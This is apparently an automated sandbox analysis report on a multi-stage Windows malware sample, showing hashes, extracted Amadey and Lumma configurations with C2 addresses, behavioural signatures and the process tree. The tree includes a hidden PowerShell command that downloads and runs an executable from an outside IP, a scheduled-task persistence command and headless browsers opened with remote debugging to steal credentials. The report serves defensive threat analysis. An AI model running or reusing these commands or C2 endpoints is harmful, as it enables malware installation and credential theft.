Analysis

  • max time kernel
    150s
  • max time network
    150s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20250314-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20250314-enlocale:en-usos:windows10-2004-x64system
  • submitted
    07/04/2025, 10:09

General

  • Target

    2025-04-07_23573a8db4c1b7f45d67aa96325236dd_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe

  • Size

    938KB

  • MD5

    23573a8db4c1b7f45d67aa96325236dd

  • SHA1

    f874c2a1450e1455e616282f4da3b2ff715967b0

  • SHA256

    2455cf14f9efe4b234215f89b672996d04d219d87a1d73aa1eb4fd497510f3e5

  • SHA512

    4bcbfc053d8c96233234b29ac9e237f6e9eb3dfd767de4d747323ee42a0cbfbef670270562741106cc4f3480e6ae695466e9f5d5316aea80e2de13d5ce841e43

  • SSDEEP

    24576:aqDEvCTbMWu7rQYlBQcBiT6rprG8a0fu:aTvC/MTQYxsWR7a0f

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://176.113.115.7/mine/random.exe

Extracted

Family

amadey

Version

5.21

Botnet

092155

C2

http://176.113.115.6

Attributes
  • install_dir

    bb556cff4a

  • install_file

    rapes.exe

  • strings_key

    a131b127e996a898cd19ffb2d92e481b

  • url_paths

    /Ni9kiput/index.php

rc4.plain

Extracted

Family

lumma

C2

https://rodformi.run/aUosoz

https://metalsyo.digital/opsa

https://ironloxp.live/aksdd

https://navstarx.shop/FoaJSi

https://wstarcloc.bet/GOksAo

https://advennture.top/GKsiio

https://atargett.top/dsANGt

https://spacedbv.world/EKdlsk

https://galxnetb.today/GsuIAo

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

  • Amadey family
  • Lumma Stealer, LummaC

    Lumma or LummaC is an infostealer written in C++ first seen in August 2022.

  • Lumma family
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 6 IoCs
  • Blocklisted process makes network request 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Downloads MZ/PE file 13 IoCs
  • Drops file in Drivers directory 2 IoCs
  • Sets service image path in registry 2 TTPs 2 IoCs
  • Uses browser remote debugging 2 TTPs 10 IoCs

    Can be used control the browser and steal sensitive information such as credentials and session cookies.

  • Checks BIOS information in registry 2 TTPs 12 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 3 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Deletes itself 1 IoCs
  • Executes dropped EXE 36 IoCs
  • Identifies Wine through registry keys 2 TTPs 6 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

  • Impair Defenses: Safe Mode Boot 1 TTPs 2 IoCs
  • Loads dropped DLL 64 IoCs
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs
  • Accesses Microsoft Outlook profiles 1 TTPs 4 IoCs
  • Adds Run key to start application 2 TTPs 7 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Enumerates connected drives 3 TTPs 23 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Writes to the Master Boot Record (MBR) 1 TTPs 2 IoCs

    Bootkits write to the MBR to gain persistence at a level below the operating system.

  • Suspicious use of NtSetInformationThreadHideFromDebugger 6 IoCs
  • Suspicious use of SetThreadContext 27 IoCs
  • Checks for VirtualBox DLLs, possible anti-VM trick 1 TTPs 2 IoCs

    Certain files are specific to VirtualBox VMs and can be used to detect execution in a VM.

  • Drops file in Program Files directory 1 IoCs
  • Drops file in Windows directory 10 IoCs
  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Detects Pyinstaller 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 34 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Checks processor information in registry 2 TTPs 22 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 6 IoCs
  • Modifies registry class 17 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: LoadsDriver 1 IoCs
  • Suspicious behavior: MapViewOfSection 5 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 8 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 23 IoCs
  • Suspicious use of SendNotifyMessage 3 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

  • outlook_office_path 1 IoCs
  • outlook_win_path 1 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\2025-04-07_23573a8db4c1b7f45d67aa96325236dd_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
    "C:\Users\Admin\AppData\Local\Temp\2025-04-07_23573a8db4c1b7f45d67aa96325236dd_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe"
    1⤵
    • System Location Discovery: System Language Discovery
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    • Suspicious use of WriteProcessMemory
    PID:3736
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c schtasks /create /tn e1Xh5maqfmY /tr "mshta C:\Users\Admin\AppData\Local\Temp\73ZfHCr0l.hta" /sc minute /mo 25 /ru "Admin" /f
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:4172
      • C:\Windows\SysWOW64\schtasks.exe
        schtasks /create /tn e1Xh5maqfmY /tr "mshta C:\Users\Admin\AppData\Local\Temp\73ZfHCr0l.hta" /sc minute /mo 25 /ru "Admin" /f
        3⤵
        • System Location Discovery: System Language Discovery
        • Scheduled Task/Job: Scheduled Task
        PID:2304
    • C:\Windows\SysWOW64\mshta.exe
      mshta C:\Users\Admin\AppData\Local\Temp\73ZfHCr0l.hta
      2⤵
      • Checks computer location settings
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:1508
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'JA2DMLA9WJLRYNIYN3BLOV0XRFU33HK4.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
        3⤵
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • Downloads MZ/PE file
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:3636
        • C:\Users\Admin\AppData\Local\TempJA2DMLA9WJLRYNIYN3BLOV0XRFU33HK4.EXE
          "C:\Users\Admin\AppData\Local\TempJA2DMLA9WJLRYNIYN3BLOV0XRFU33HK4.EXE"
          4⤵
          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
          • Checks BIOS information in registry
          • Checks computer location settings
          • Executes dropped EXE
          • Identifies Wine through registry keys
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • Drops file in Windows directory
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of WriteProcessMemory
          PID:436
          • C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
            "C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"
            5⤵
            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
            • Downloads MZ/PE file
            • Checks BIOS information in registry
            • Checks computer location settings
            • Executes dropped EXE
            • Identifies Wine through registry keys
            • Suspicious use of NtSetInformationThreadHideFromDebugger
            • System Location Discovery: System Language Discovery
            • Modifies registry class
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of WriteProcessMemory
            PID:848
            • C:\Users\Admin\AppData\Local\Temp\10480540101\ibC8xs1.exe
              "C:\Users\Admin\AppData\Local\Temp\10480540101\ibC8xs1.exe"
              6⤵
              • Executes dropped EXE
              • Adds Run key to start application
              • Suspicious use of SetThreadContext
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of WriteProcessMemory
              PID:2912
              • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\um5bn14s\um5bn14s.cmdline"
                7⤵
                • Suspicious use of WriteProcessMemory
                PID:3648
                • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESDD6.tmp" "c:\Users\Admin\AppData\Local\Temp\um5bn14s\CSCF196E86944004C4E9B2511622423A2F9.TMP"
                  8⤵
                    PID:1324
                • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                  7⤵
                  • Downloads MZ/PE file
                  • Accesses Microsoft Outlook accounts
                  • Accesses Microsoft Outlook profiles
                  • Suspicious use of SetThreadContext
                  • Drops file in Program Files directory
                  • System Location Discovery: System Language Discovery
                  • Checks processor information in registry
                  • Suspicious behavior: AddClipboardFormatListener
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  • Suspicious use of FindShellTrayWindow
                  • Suspicious use of SetWindowsHookEx
                  • outlook_office_path
                  • outlook_win_path
                  PID:1776
                  • C:\Windows\system32\rundll32.exe
                    "C:\Windows\system32\rundll32.exe" "C:\Windows\system32\shell32.dll",#61
                    8⤵
                    • Modifies registry class
                    • Suspicious use of FindShellTrayWindow
                    PID:4500
                  • C:\Windows\system32\rundll32.exe
                    "C:\Windows\system32\rundll32.exe" "C:\Windows\system32\shell32.dll",#61
                    8⤵
                    • Modifies registry class
                    • Suspicious use of FindShellTrayWindow
                    PID:1700
                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                    --restore-last-session --remote-debugging-port=9223 --remote-allow-origins=* --headless "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --profile-directory="Default"
                    8⤵
                    • Uses browser remote debugging
                    • Enumerates system info in registry
                    • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                    • Suspicious use of FindShellTrayWindow
                    PID:1560
                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0x104,0x108,0x10c,0x100,0x7c,0x7ff83a95dcf8,0x7ff83a95dd04,0x7ff83a95dd10
                      9⤵
                        PID:4000
                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --headless --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=2004,i,9361191641412909778,2619622656377567075,262144 --disable-features=PaintHolding --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=1996 /prefetch:2
                        9⤵
                          PID:700
                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --field-trial-handle=2248,i,9361191641412909778,2619622656377567075,262144 --disable-features=PaintHolding --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=2244 /prefetch:3
                          9⤵
                            PID:872
                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --field-trial-handle=2384,i,9361191641412909778,2619622656377567075,262144 --disable-features=PaintHolding --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=2380 /prefetch:8
                            9⤵
                              PID:1596
                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3264,i,9361191641412909778,2619622656377567075,262144 --disable-features=PaintHolding --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=3260 /prefetch:1
                              9⤵
                              • Uses browser remote debugging
                              PID:4008
                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3288,i,9361191641412909778,2619622656377567075,262144 --disable-features=PaintHolding --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=3284 /prefetch:1
                              9⤵
                              • Uses browser remote debugging
                              PID:1756
                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --extension-process --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4244,i,9361191641412909778,2619622656377567075,262144 --disable-features=PaintHolding --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=4252 /prefetch:2
                              9⤵
                              • Uses browser remote debugging
                              PID:1100
                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=4612,i,9361191641412909778,2619622656377567075,262144 --disable-features=PaintHolding --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=4432 /prefetch:1
                              9⤵
                              • Uses browser remote debugging
                              PID:5196
                          • C:\Windows\system32\rundll32.exe
                            "C:\Windows\system32\rundll32.exe" "C:\Windows\system32\shell32.dll",#61
                            8⤵
                            • Modifies registry class
                            • Suspicious use of FindShellTrayWindow
                            PID:5924
                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                            --restore-last-session --remote-debugging-port=9225 --remote-allow-origins=* --headless "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --profile-directory="Default"
                            8⤵
                            • Uses browser remote debugging
                            • Enumerates system info in registry
                            • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                            • Suspicious use of FindShellTrayWindow
                            PID:6044
                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.99 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.69 --initial-client-data=0x23c,0x240,0x244,0x238,0x264,0x7ff83b90f208,0x7ff83b90f214,0x7ff83b90f220
                              9⤵
                                PID:6072
                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --headless --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=1988,i,2724790333369867357,17091601556602995792,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=1972 /prefetch:2
                                9⤵
                                  PID:5316
                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --always-read-main-dll --field-trial-handle=2320,i,2724790333369867357,17091601556602995792,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=2316 /prefetch:3
                                  9⤵
                                    PID:5392
                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --always-read-main-dll --field-trial-handle=2668,i,2724790333369867357,17091601556602995792,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=2664 /prefetch:8
                                    9⤵
                                      PID:212
                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --remote-debugging-port=9225 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --always-read-main-dll --field-trial-handle=3608,i,2724790333369867357,17091601556602995792,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=3600 /prefetch:1
                                      9⤵
                                      • Uses browser remote debugging
                                      PID:5716
                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --instant-process --remote-debugging-port=9225 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --always-read-main-dll --field-trial-handle=3620,i,2724790333369867357,17091601556602995792,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=3604 /prefetch:1
                                      9⤵
                                      • Uses browser remote debugging
                                      PID:5708
                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --remote-debugging-port=9225 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --always-read-main-dll --field-trial-handle=4316,i,2724790333369867357,17091601556602995792,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=4312 /prefetch:1
                                      9⤵
                                      • Uses browser remote debugging
                                      PID:5732
                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --extension-process --renderer-sub-type=extension --remote-debugging-port=9225 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --always-read-main-dll --field-trial-handle=4332,i,2724790333369867357,17091601556602995792,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=4320 /prefetch:2
                                      9⤵
                                      • Uses browser remote debugging
                                      PID:1416
                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --always-read-main-dll --field-trial-handle=3744,i,2724790333369867357,17091601556602995792,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=3732 /prefetch:8
                                      9⤵
                                        PID:5272
                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --always-read-main-dll --field-trial-handle=5160,i,2724790333369867357,17091601556602995792,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=5140 /prefetch:8
                                        9⤵
                                          PID:5540
                                      • C:\Windows\system32\rundll32.exe
                                        "C:\Windows\system32\rundll32.exe" "C:\Windows\system32\shell32.dll",#61
                                        8⤵
                                        • Modifies registry class
                                        • Suspicious use of FindShellTrayWindow
                                        PID:5380
                                      • C:\Windows\system32\rundll32.exe
                                        "C:\Windows\system32\rundll32.exe" "C:\Windows\system32\shell32.dll",#61
                                        8⤵
                                        • Modifies registry class
                                        • Suspicious use of FindShellTrayWindow
                                        PID:3816
                                      • C:\Windows\system32\rundll32.exe
                                        "C:\Windows\system32\rundll32.exe" "C:\Windows\system32\shell32.dll",#61
                                        8⤵
                                        • Modifies registry class
                                        • Suspicious use of FindShellTrayWindow
                                        PID:440
                                      • C:\Windows\system32\rundll32.exe
                                        "C:\Windows\system32\rundll32.exe" "C:\Windows\system32\shell32.dll",#61
                                        8⤵
                                        • Modifies registry class
                                        • Suspicious use of FindShellTrayWindow
                                        PID:5264
                                      • C:\Windows\system32\rundll32.exe
                                        "C:\Windows\system32\rundll32.exe" "C:\Windows\system32\shell32.dll",#61
                                        8⤵
                                        • Modifies registry class
                                        • Suspicious use of FindShellTrayWindow
                                        PID:1732
                                      • C:\Windows\system32\rundll32.exe
                                        "C:\Windows\system32\rundll32.exe" "C:\Windows\system32\shell32.dll",#61
                                        8⤵
                                        • Modifies registry class
                                        • Suspicious use of FindShellTrayWindow
                                        PID:2888
                                      • C:\Windows\system32\rundll32.exe
                                        "C:\Windows\system32\rundll32.exe" "C:\Windows\system32\shell32.dll",#61
                                        8⤵
                                        • Modifies registry class
                                        • Suspicious use of FindShellTrayWindow
                                        PID:4244
                                      • C:\Windows\system32\rundll32.exe
                                        "C:\Windows\system32\rundll32.exe" "C:\Windows\system32\shell32.dll",#61
                                        8⤵
                                        • Modifies registry class
                                        • Suspicious use of FindShellTrayWindow
                                        PID:1008
                                      • C:\Windows\system32\rundll32.exe
                                        "C:\Windows\system32\rundll32.exe" "C:\Windows\system32\shell32.dll",#61
                                        8⤵
                                        • Modifies registry class
                                        • Suspicious use of FindShellTrayWindow
                                        PID:5724
                                      • C:\Windows\system32\rundll32.exe
                                        "C:\Windows\system32\rundll32.exe" "C:\Windows\system32\shell32.dll",#61
                                        8⤵
                                        • Modifies registry class
                                        • Suspicious use of FindShellTrayWindow
                                        PID:7884
                                      • C:\Windows\system32\rundll32.exe
                                        "C:\Windows\system32\rundll32.exe" "C:\Windows\system32\shell32.dll",#61
                                        8⤵
                                        • Modifies registry class
                                        • Suspicious use of FindShellTrayWindow
                                        PID:6344
                                      • C:\Windows\system32\rundll32.exe
                                        "C:\Windows\system32\rundll32.exe" "C:\Windows\system32\shell32.dll",#61
                                        8⤵
                                        • Modifies registry class
                                        • Suspicious use of FindShellTrayWindow
                                        PID:6824
                                      • C:\Windows\system32\rundll32.exe
                                        "C:\Windows\system32\rundll32.exe" "C:\Windows\system32\shell32.dll",#61
                                        8⤵
                                        • Modifies registry class
                                        • Suspicious use of FindShellTrayWindow
                                        PID:8608
                                  • C:\Users\Admin\AppData\Local\Temp\10480910101\DgQBvwg.exe
                                    "C:\Users\Admin\AppData\Local\Temp\10480910101\DgQBvwg.exe"
                                    6⤵
                                    • Executes dropped EXE
                                    • Adds Run key to start application
                                    • Suspicious use of SetThreadContext
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:2836
                                    • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                      "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\epds5nbj\epds5nbj.cmdline"
                                      7⤵
                                        PID:1052
                                        • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                          C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES5F80.tmp" "c:\Users\Admin\AppData\Local\Temp\epds5nbj\CSCD457F3A6121541758328563B766ABCF6.TMP"
                                          8⤵
                                            PID:4776
                                        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                          7⤵
                                            PID:3432
                                          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                            7⤵
                                            • System Location Discovery: System Language Discovery
                                            PID:4144
                                        • C:\Windows\SysWOW64\msiexec.exe
                                          "C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\AppData\Local\Temp\10481850271\ArFLIYD.msi" /quiet
                                          6⤵
                                          • System Location Discovery: System Language Discovery
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:4580
                                        • C:\Users\Admin\AppData\Local\Temp\10491450101\5LlBAvp.exe
                                          "C:\Users\Admin\AppData\Local\Temp\10491450101\5LlBAvp.exe"
                                          6⤵
                                          • Executes dropped EXE
                                          • Suspicious use of SetThreadContext
                                          PID:4688
                                          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                            7⤵
                                            • System Location Discovery: System Language Discovery
                                            PID:3656
                                        • C:\Users\Admin\AppData\Local\Temp\10491470101\YSdglTu.exe
                                          "C:\Users\Admin\AppData\Local\Temp\10491470101\YSdglTu.exe"
                                          6⤵
                                          • Executes dropped EXE
                                          PID:5816
                                          • C:\Users\Admin\AppData\Local\Temp\10491470101\YSdglTu.exe
                                            "C:\Users\Admin\AppData\Local\Temp\10491470101\YSdglTu.exe"
                                            7⤵
                                            • Executes dropped EXE
                                            • Loads dropped DLL
                                            PID:2256
                                        • C:\Users\Admin\AppData\Local\Temp\10491920101\Pgpx359.exe
                                          "C:\Users\Admin\AppData\Local\Temp\10491920101\Pgpx359.exe"
                                          6⤵
                                          • Executes dropped EXE
                                          • System Location Discovery: System Language Discovery
                                          PID:4952
